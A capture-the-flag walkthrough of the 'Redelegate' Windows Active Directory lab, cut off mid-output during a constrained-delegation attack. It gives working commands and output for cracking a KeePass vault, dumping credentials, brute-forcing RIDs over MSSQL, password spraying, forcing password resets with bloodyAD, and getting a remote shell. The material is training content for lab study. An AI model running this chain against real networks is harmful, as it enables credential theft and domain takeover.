Overview
- Type Machines
- OS Windows
- Severity Hard
- Creator Geiseric
- Release date 2024 Nov 22
Enumeration
Start the instance via Discord and let’s go:

10.10.86.64
Nmap
$ nmap -sC -sV -Pn -p- --min-rate=1000 -T4 10.10.86.64
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 10-20-24 12:11AM 434 CyberAudit.txt
| 10-20-24 04:14AM 2622 Shared.kdbx
|_10-20-24 12:26AM 580 TrainingAgenda.txt
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-25 11:26:40Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-25T10:54:03
|_Not valid after: 2054-11-25T10:54:03
| ms-sql-ntlm-info:
| 10.10.86.64:1433:
| Target_Name: REDELEGATE
| NetBIOS_Domain_Name: REDELEGATE
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: redelegate.vl
| DNS_Computer_Name: dc.redelegate.vl
| DNS_Tree_Name: redelegate.vl
|_ Product_Version: 10.0.20348
|_ssl-date: 2024-11-25T11:27:44+00:00; -1s from scanner time.
| ms-sql-info:
| 10.10.86.64:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-11-25T11:27:44+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=dc.redelegate.vl
| Not valid before: 2024-10-30T13:31:09
|_Not valid after: 2025-05-01T13:31:09
| rdp-ntlm-info:
| Target_Name: REDELEGATE
| NetBIOS_Domain_Name: REDELEGATE
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: redelegate.vl
| DNS_Computer_Name: dc.redelegate.vl
| DNS_Tree_Name: redelegate.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-11-25T11:27:33+00:00
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49647/tcp open msrpc Microsoft Windows RPC
49659/tcp open msrpc Microsoft Windows RPC
49661/tcp open msrpc Microsoft Windows RPC
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49932/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.10.102.76:49932:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 49932
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-25T10:54:03
|_Not valid after: 2054-11-25T10:54:03
|_ssl-date: 2024-11-25T11:27:44+00:00; -1s from scanner time.
| ms-sql-ntlm-info:
| 10.10.86.64:49932:
| Target_Name: REDELEGATE
| NetBIOS_Domain_Name: REDELEGATE
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: redelegate.vl
| DNS_Computer_Name: dc.redelegate.vl
| DNS_Tree_Name: redelegate.vl
|_ Product_Version: 10.0.20348
63299/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time:
| date: 2024-11-25T11:27:35
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.63 seconds
- Add
dc.redelegate.vl,redelegate.vlin in /etc/hosts
FTP enumeration (21/tcp)
We saw some interesting file in the nmap output then let’s dowload all of them:
$ ftp -i anonymous@dc.redelegate.vl
Connected to dc.redelegate.vl.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: test@test.com
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||51139|)
125 Data connection already open; Transfer starting.
10-20-24 12:11AM 434 CyberAudit.txt
10-20-24 04:14AM 2622 Shared.kdbx
10-20-24 12:26AM 580 TrainingAgenda.txt
226 Transfer complete.
ftp> binary
200 Type set to I.
ftp> mget *
local: CyberAudit.txt remote: CyberAudit.txt
229 Entering Extended Passive Mode (|||58326|)
125 Data connection already open; Transfer starting.
100% |*************************************************************************************************************| 434 1.54 KiB/s 00:00 ETA
226 Transfer complete.
434 bytes received in 00:00 (1.54 KiB/s)
local: Shared.kdbx remote: Shared.kdbx
229 Entering Extended Passive Mode (|||58327|)
125 Data connection already open; Transfer starting.
100% |*************************************************************************************************************| 2622 9.36 KiB/s 00:00 ETA
226 Transfer complete.
2622 bytes received in 00:00 (9.35 KiB/s)
local: TrainingAgenda.txt remote: TrainingAgenda.txt
229 Entering Extended Passive Mode (|||58331|)
125 Data connection already open; Transfer starting.
100% |*************************************************************************************************************| 580 2.06 KiB/s 00:00 ETA
226 Transfer complete.
580 bytes received in 00:00 (2.06 KiB/s)
ftp> quit
221 Goodbye.
$ cat CyberAudit.txt
OCTOBER 2024 AUDIT FINDINGS
[!] CyberSecurity Audit findings:
1) Weak User Passwords
2) Excessive Privilege assigned to users
3) Unused Active Directory objects
4) Dangerous Active Directory ACLs
[*] Remediation steps:
1) Prompt users to change their passwords: DONE
2) Check privileges for all users and remove high privileges: DONE
3) Remove unused objects in the domain: IN PROGRESS
4) Recheck ACLs: IN PROGRESS
Seems security checks for some weak/dangerous AD objects and ACLs are not yet completed then maybe possible to exploit them to grant privilege.
$ cat TrainingAgenda.txt
EMPLOYEE CYBER AWARENESS TRAINING AGENDA (OCTOBER 2024)
Friday 4th October | 14.30 - 16.30 - 53 attendees
"Don't take the bait" - How to better understand phishing emails and what to do when you see one
Friday 11th October | 15.30 - 17.30 - 61 attendees
"Social Media and their dangers" - What happens to what you post online?
Friday 18th October | 11.30 - 13.30 - 7 attendees
"Weak Passwords" - Why "SeasonYear!" is not a good password
Friday 25th October | 9.30 - 12.30 - 29 attendees
"What now?" - Consequences of a cyber attack and how to mitigate them ```
> Interesting awareness schedule and some people are using weak passwords like the `SeasonYear!` format so we can create a list based on this format then try brute-force attack
```sh
$ file Shared.kdbx
Shared.kdbx: Keepass password database 2.x KDBX
Found a Keepass vault
Keepass vault cracking
Try to crack the Keepass vault using our custom password list following the previous hint SeasonYear! and simplify the SecList version based on seasons:
$ cat weak_passwords.txt
Spring2024!
Summer2024!
Autumn2024!
Winter2024!
Fall2024!
$ keepass2john Shared.kdbx | tee shared.hash
Shared:$keepass$*2*600000*0*ce7395f413946b0cd279501e510cf8a988f39baca623dd86beaee651025662e6*e4f9d51a5df3e5f9ca1019cd57e10d60f85f48228da3f3b4cf1ffee940e20e01*18c45dbbf7d365a13d6714059937ebad*a59af7b75908d7bdf68b6fd929d315ae6bfe77262e53c209869a236da830495f*806f9dd2081c364e66a114ce3adeba60b282fc5e5ee6f324114d38de9b4502ca
OR
$ keepass2john Shared.kdbx > shared.hash
$ cat shared.hash
Shared:$keepass$*2*600000*0*ce7395f413946b0cd279501e510cf8a988f39baca623dd86beaee651025662e6*e4f9d51a5df3e5f9ca1019cd57e10d60f85f48228da3f3b4cf1ffee940e20e01*18c45dbbf7d365a13d6714059937ebad*a59af7b75908d7bdf68b6fd929d315ae6bfe77262e53c209869a236da830495f*806f9dd2081c364e66a114ce3adeba60b282fc5e5ee6f324114d38de9b4502ca
- Using JohnTheRipper:
$ john shared.hash -w=weak_passwords.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 600000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Fall2024! (Shared)
1g 0:00:00:00 DONE (2024-11-26 14:51) 4.545g/s 22.72p/s 22.72c/s 22.72C/s Spring2024!..Fall2024!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
- Using Hashcat:
We need to edit the hash to sanitize (remove data before $keepass$):
$ cat shared.hashcat
$keepass$*2*600000*0*ce7395f413946b0cd279501e510cf8a988f39baca623dd86beaee651025662e6*e4f9d51a5df3e5f9ca1019cd57e10d60f85f48228da3f3b4cf1ffee940e20e01*18c45dbbf7d365a13d6714059937ebad*a59af7b75908d7bdf68b6fd929d315ae6bfe77262e53c209869a236da830495f*806f9dd2081c364e66a114ce3adeba60b282fc5e5ee6f324114d38de9b4502ca
Let’s crack it:
$ hashcat -a 0 -w 4 -m 13400 shared.hashcat weak_passwords.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-skylake-avx512-AMD Ryzen 9 8945HS w/ Radeon 780M Graphics, 2899/5862 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache built:
* Filename..: weak_passwords.txt
* Passwords.: 5
* Bytes.....: 58
* Keyspace..: 5
* Runtime...: 0 secs
The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.
$keepass$*2*600000*0*ce7395f413946b0cd279501e510cf8a988f39baca623dd86beaee651025662e6*e4f9d51a5df3e5f9ca1019cd57e10d60f85f48228da3f3b4cf1ffee940e20e01*18c45dbbf7d365a13d6714059937ebad*a59af7b75908d7bdf68b6fd929d315ae6bfe77262e53c209869a236da830495f*806f9dd2081c364e66a114ce3adeba60b282fc5e5ee6f324114d38de9b4502ca:Fall2024!
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13400 (KeePass 1 (AES/Twofish) and KeePass 2 (AES))
Hash.Target......: $keepass$*2*600000*0*ce7395f413946b0cd279501e510cf8...4502ca
Time.Started.....: Tue Nov 26 14:51:19 2024 (0 secs)
Time.Estimated...: Tue Nov 26 14:51:19 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (weak_passwords.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 25 H/s (0.24ms) @ Accel:512 Loops:1024 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5/5 (100.00%)
Rejected.........: 0/5 (0.00%)
Restore.Point....: 0/5 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:599040-600000
Candidate.Engine.: Device Generator
Candidates.#1....: Spring2024! -> Fall2024!
Hardware.Mon.#1..: Util: 46%
Started: Tue Nov 26 14:51:18 2024
Stopped: Tue Nov 26 14:51:20 2024
Found the keepass vault password:
Fall2024!
Open the vault using KeepassXC UI:
Or using the KeepassXC CLI:
$ keepassxc-cli export Shared.kdbx --format csv | awk -F',' '{print $3 ":" $4}' | sed 's/"//g'
Enter password to unlock Shared.kdbx:
KdbxXmlReader::readDatabase: found 1 invalid group reference(s)
Username:Password
FTPUser:SguPZBKdRyxWzvXRWy6U
Administrator:Spdv41gg4BlBgSYIW1gF
WordPress Panel:cn4KOEgsHqvKXPjEnSD9
SQLGuest:zDPBpaF4FywlqIv11vii
:22331144
Timesheet:hMFS4I0Kj8Rcd62vqi5X
Payroll:cVkqz4bCM7kJRSNlgx2G
Summary:
- Shared → Finance
Payrol AppUser name Payroll
Password cVkqz4bCM7kJRSNlgx2G
Timesheet ManagerUser name Timesheet
Password hMFS4I0Kj8Rcd62vqi5X
- Shared → HelpDesk
KeyFob CombinationPassword 22331144
- Shared → IT
FS01 AdminUser name Administrator
Password Spdv41gg4BlBgSYIW1gF
FTPUser name FTPUser
Password SguPZBKdRyxWzvXRWy6U
Notes Deprecated
SQL Guest AccessUser name SQLGuest
Password zDPBpaF4FywlqIv11vii
WEB01User name WordPress Panel
Password cn4KOEgsHqvKXPjEnSD9
MSSQL enumeration (1433/tcp)
As we found SQLGuest:zDPBpaF4FywlqIv11vii and we known that MSSQL is open on the DC so let’s dig into:
$ impacket-mssqlclient sqlguest:'zDPBpaF4FywlqIv11vii'@dc.redelegate.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (SQLGuest guest@master)>
We tried to use xp_dirtree to get the hash of the service account running the service, but in this case it won’t help as not possible to crack it.
We can also brute forced RIDs to enumerate Domain users.
- Automatically using Metasploit mssql auxiliary modules
mssql_enum_domain_accounts:
$ msfconsole -qx "use auxiliary/admin/mssql/mssql_enum_domain_accounts; set RHOST dc.redelegate.vl; set RPORT 1433; set TDSENCRYPTION true; set USERNAME sqlguest; set PASSWORD zDPBpaF4FywlqIv11vii; exploit -j"
RHOST => dc.redelegate.vl
RPORT => 1433
[!] Unknown datastore option: TDSENCRYPTION.
TDSENCRYPTION => true
USERNAME => sqlguest
PASSWORD => zDPBpaF4FywlqIv11vii
[*] Running module against 10.10.110.185
[*] 10.10.110.185:1433 - Attempting to connect to the database server at 10.10.110.185:1433 as sqlguest...
[+] 10.10.110.185:1433 - Connected.
[*] 10.10.110.185:1433 - SQL Server Name: WIN-Q13O908QBPG
[*] 10.10.110.185:1433 - Domain Name: REDELEGATE
[+] 10.10.110.185:1433 - Found the domain sid: 010500000000000515000000a185deefb22433798d8e847a
[*] 10.10.110.185:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient...
[*] 10.10.110.185:1433 - - WIN-Q13O908QBPG\Administrator
[*] 10.10.110.185:1433 - - REDELEGATE\Guest
[*] 10.10.110.185:1433 - - REDELEGATE\krbtgt
[*] 10.10.110.185:1433 - - REDELEGATE\Domain Admins
[*] 10.10.110.185:1433 - - REDELEGATE\Domain Users
[*] 10.10.110.185:1433 - - REDELEGATE\Domain Guests
[*] 10.10.110.185:1433 - - REDELEGATE\Domain Computers
[*] 10.10.110.185:1433 - - REDELEGATE\Domain Controllers
[*] 10.10.110.185:1433 - - REDELEGATE\Cert Publishers
[*] 10.10.110.185:1433 - - REDELEGATE\Schema Admins
[*] 10.10.110.185:1433 - - REDELEGATE\Enterprise Admins
[*] 10.10.110.185:1433 - - REDELEGATE\Group Policy Creator Owners
[*] 10.10.110.185:1433 - - REDELEGATE\Read-only Domain Controllers
[*] 10.10.110.185:1433 - - REDELEGATE\Cloneable Domain Controllers
[*] 10.10.110.185:1433 - - REDELEGATE\Protected Users
[*] 10.10.110.185:1433 - - REDELEGATE\Key Admins
[*] 10.10.110.185:1433 - - REDELEGATE\Enterprise Key Admins
[*] 10.10.110.185:1433 - - REDELEGATE\RAS and IAS Servers
[*] 10.10.110.185:1433 - - REDELEGATE\Allowed RODC Password Replication Group
[*] 10.10.110.185:1433 - - REDELEGATE\Denied RODC Password Replication Group
[*] 10.10.110.185:1433 - - REDELEGATE\SQLServer2005SQLBrowserUser$WIN-Q13O908QBPG
[*] 10.10.110.185:1433 - - REDELEGATE\DC$
[*] 10.10.110.185:1433 - - REDELEGATE\FS01$
[*] 10.10.110.185:1433 - - REDELEGATE\Christine.Flanders
[*] 10.10.110.185:1433 - - REDELEGATE\Marie.Curie
[*] 10.10.110.185:1433 - - REDELEGATE\Helen.Frost
[*] 10.10.110.185:1433 - - REDELEGATE\Michael.Pontiac
[*] 10.10.110.185:1433 - - REDELEGATE\Mallory.Roberts
[*] 10.10.110.185:1433 - - REDELEGATE\James.Dinkleberg
[*] 10.10.110.185:1433 - - REDELEGATE\Helpdesk
[*] 10.10.110.185:1433 - - REDELEGATE\IT
[*] 10.10.110.185:1433 - - REDELEGATE\Finance
[*] 10.10.110.185:1433 - - REDELEGATE\DnsAdmins
[*] 10.10.110.185:1433 - - REDELEGATE\DnsUpdateProxy
[*] 10.10.110.185:1433 - - REDELEGATE\Ryan.Cooper
[*] 10.10.110.185:1433 - - REDELEGATE\sql_svc
- Manually following netspi - SQL server enumerating Domain accounts:
Get the domain name:
SQL (SQLGuest guest@master)> SELECT DEFAULT_DOMAIN();
----------
REDELEGATE
Get the Domain SID by querying one of the default groups for it (the first 48 bytes will be the domain SID):
- We get the full RID (in HEX) then we will convert to a String and extract the domain SID by taking the first 48 bytes.
SIDstands for Security Identifier.RIDstands for Relative Identifier.- Microsoft - Understand security identifiers
SQL (SQLGuest guest@master)> SELECT SUSER_SID('REDELEGATE\Domain Admins')
-----------------------------------------------------------
b'010500000000000515000000a185deefb22433798d8e847a00020000'
- Using Powershell to convert from HEX to SID:
PS C:\Users\XXXXX\Redelegate> type .\convertRID2SID.ps1
$BinarySID = "010500000000000515000000a185deefb22433798d8e847a00020000"
$SIDBytes = [byte[]]::new($BinarySID.Length / 2)
for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
$SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
}
$SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
$SID.Value
PS C:\Users\XXXXX\Redelegate> .\convertHEX2SID.ps1
S-1-5-21-4024337825-2033394866-2055507597-512
- Using Python to convert from HEX to SID:
$ cat convertHEX2SID.py
#!/usr/bin/python3
def hex_sid_to_string_sid(hex_sid):
sid_bytes = bytes.fromhex(hex_sid[2:])
revision = sid_bytes[0]
sub_auth_count = sid_bytes[1]
identifier_authority = int.from_bytes(sid_bytes[2:8], byteorder='big')
sub_authorities = [
int.from_bytes(sid_bytes[8 + (i * 4):12 + (i * 4)], byteorder='little')
for i in range(sub_auth_count)
]
string_sid = f"S-{revision}-{identifier_authority}"
for sub_auth in sub_authorities:
string_sid += f"-{sub_auth}"
return string_sid
hex_sid = "0x010500000000000515000000a185deefb22433798d8e847a00020000"
sid = hex_sid_to_string_sid(hex_sid)
print(sid)
$ python3 convertHEX2SID.py
S-1-5-21-4024337825-2033394866-2055507597-512
We can now enumerate users by appending something different on the part that identifies the user (here 512).
For example with a quick bash loop:
$ cat Domain_Users_enum.sh
#!/bin/bash
USERNAME="sqlguest"
PASSWORD="zDPBpaF4FywlqIv11vii"
SERVER="redelegate.vl"
SID_BASE="S-1-5-21-4024337825-2033394866-2055507597"
for SID in {1100..1200}; do
QUERY="SELECT SUSER_SNAME(SID_BINARY(N'$SID_BASE-$SID'))"
echo "$QUERY" > query.sql
impacket-mssqlclient "$USERNAME:$PASSWORD@$SERVER" -file query.sql | grep -a REDELEGATE
rm query.sql
done
$ bash Domain_Users_enum.sh
REDELEGATE\FS01$
REDELEGATE\Christine.Flanders
REDELEGATE\Marie.Curie
REDELEGATE\Helen.Frost
REDELEGATE\Michael.Pontiac
REDELEGATE\Mallory.Roberts
REDELEGATE\James.Dinkleberg
REDELEGATE\Helpdesk
REDELEGATE\IT
REDELEGATE\Finance
REDELEGATE\DnsAdmins
REDELEGATE\DnsUpdateProxy
REDELEGATE\Ryan.Cooper
REDELEGATE\sql_svc
^C
Foothold - User
Password spraying
As we got users and passwords then we will use them for password spraying to find authenticated users in the redelegate.vl domain:
$ cat users.txt
Administrator
Christine.Flanders
Marie.Curie
Helen.Frost
Michael.Pontiac
Mallory.Roberts
James.Dinkleberg
Ryan.Cooper
sql_svc
$ cat passwords.txt
Spring2024!
Summer2024!
Autumn2024!
Winter2024!
Fall2024!
cVkqz4bCM7kJRSNlgx2G
hMFS4I0Kj8Rcd62vqi5X
22331144
Spdv41gg4BlBgSYIW1gF
SguPZBKdRyxWzvXRWy6U
zDPBpaF4FywlqIv11vii
cn4KOEgsHqvKXPjEnSD9
$ nxc smb dc.redelegate.vl -u users.txt -p passwords.txt --continue-on-success
SMB 10.10.86.64 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB 10.10.86.64 445 DC [-] redelegate.vl\Administrator:Spring2024! STATUS_LOGON_FAILURE
SMB 10.10.86.64 445 DC [-] redelegate.vl\Christine.Flanders:Spring2024! STATUS_LOGON_FAILURE
SMB 10.10.86.64 445 DC [-] redelegate.vl\Marie.Curie:Spring2024! STATUS_LOGON_FAILURE
SMB 10.10.86.64 445 DC [-] redelegate.vl\Helen.Frost:Spring2024! STATUS_LOGON_FAILURE
SMB 10.10.86.64 445 DC [-] redelegate.vl\Michael.Pontiac:Spring2024! STATUS_LOGON_FAILURE
SMB 10.10.86.64 445 DC [-] redelegate.vl\Mallory.Roberts:Spring2024! STATUS_ACCOUNT_RESTRICTION
...
SMB 10.10.86.64 445 DC [+] redelegate.vl\Marie.Curie:Fall2024!
...
Mallory.Robertsis under account restriction- Found
Marie.Curie:Fall2024!
AD enumerating (Redelegate_User)
$ nxc ldap dc.redelegate.vl -u marie.curie -p 'Fall2024!' --bloodhound -c all --dns-server 10.10.86.64
SMB 10.10.86.64 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
LDAP 10.10.86.64 389 DC [+] redelegate.vl\marie.curie:Fall2024!
LDAP 10.10.86.64 389 DC Resolved collection methods: dcom, session, acl, rdp, group, psremote, container, trusts, objectprops, localadmin
LDAP 10.10.86.64 389 DC Done in 00M 53S
LDAP 10.10.86.64 389 DC Compressing output into /home/user/.nxc/logs/DC_10.10.86.64_2024-11-26_165626_bloodhound.zip
Ingest to BloodHound then let’s go to analyze:
Marie.Curieis a member of theHelpdeskgroup, means she has theForceChangePasswordpermission on the userHelen.Frost.
Let’s go to change the Helen’s password:
$ bloodyAD --host dc.redelegate.vl -d redelegate.vl -u 'marie.curie' -p 'Fall2024!' set password 'helen.frost' 'Azerty1234!'
[+] Password changed successfully!
Helen.Frostis a member of theRemote Management Usersgroup, means she has theCanPSRemotepermission to the DC.
BH Summary:
Then let’s connect to the DC and get the user flag Redelegate_User:
$ evil-winrm -i dc.redelegate.vl -u helen.frost -p 'Azerty1234!'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> ls ..\desktop
Directory: C:\Users\Helen.Frost\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/30/2024 9:05 AM 36 user.txt
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> type ..\desktop\user.txt
VL{036daaf2f72c183cc4ec89824b40f076}
During our BH analysis, we saw also that ryan.cooper is a Domain Admin:
Privilege escalating
We saw in BH that Helen.Frost is a member of the IT group, means she has the GenericAll permission to the computer FS01$:
Check her privileges:
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
She has
SeEnableDelegationPrivilege, that means she can enable delegation privileges on theredelegate.vldomain.
Constrained Delegation abusing (Redelegate_Root)
There are 3 types of delegation:
- Unconstrained delegations (KUD): a service can impersonate users on any other service.
- Constrained delegations (KCD): a service can impersonate users on a set of services
- Resource based constrained delegations (RBCD) : a set of services can impersonate users on a service
We will focus on Constrained Delegation because:
- not require a new DNS entry (needed for
Unconstrained delegations). - require control of a machine account (we saw that
helen.frostcan controlFS01$.
Firstly, we reset the password of that computer object FS01$:
$ bloodyAD --host dc.redelegate.vl -d redelegate.vl -u 'helen.frost' -p 'Azerty1234!' set password 'fs01$' 'Azerty1234!'
[+] Password changed successfully!
Now we control
FS01$
Secondly, Additionally, we need to use our SeEnableDelegationPrivilege to make the following required changes:
- Using Cravate Rouge’s bloodyAD:
Check the FS01$ object:
$ bloodyAD --host dc.redelegate.vl -d redelegate.vl -u 'helen.frost' -p 'Azerty1234!' get object 'CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL'
distinguishedName: CN=FS01,CN=Computers,DC=redelegate,DC=vl
accountExpires: 1601-01-01 00:00:00+00:00
badPasswordTime: 2024-10-20 13:58:06.417616+00:00
cn: FS01
dSCorePropagationData: 2024-10-20 14:06:31+00:00
instanceType: 4
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2024-10-20 14:14:03.559976+00:00
lastLogonTimestamp: 2024-10-20 14:08:36.745062+00:00
logonCount: 4
logonHours: ////////////////////////////
nTSecurityDescriptor: O:S-1-5-21-4024337825-2033394866-2055507597-512G:S-1-5-21-4024337825-2033394866-2055507597-512D:AI(OA;;0x30;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-4024337825-2033394866-2055507597-517)(OA;;0x3;bf967aa8-0de6-11d0-a285-00aa003049e2;;S-1-5-32-550)(OA;;RP;46a9b11d-60ae-405a-b7e8-ff8a58d456d2;;S-1-5-32-560)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;S-1-1-0)(OA;;SW;72e39547-7b18-11d1-adef-00c04fd8d5cd;;S-1-5-10)(OA;;SW;f3a64788-5306-11d1-a9c5-0000f80367c1;;S-1-5-10)(OA;;0x30;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-10)(A;;0xf01ff;;;S-1-5-21-4024337825-2033394866-2055507597-512)(A;;0xf01ff;;;S-1-5-21-4024337825-2033394866-2055507597-1113)(A;;0xf01ff;;;S-1-5-32-548)(A;;0x3;;;S-1-5-10)(A;;0x20094;;;S-1-5-11)(A;;0xf01ff;;;S-1-5-18)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-4024337825-2033394866-2055507597-526)(OA;CIID;0x30;5b47d60f-6090-40b2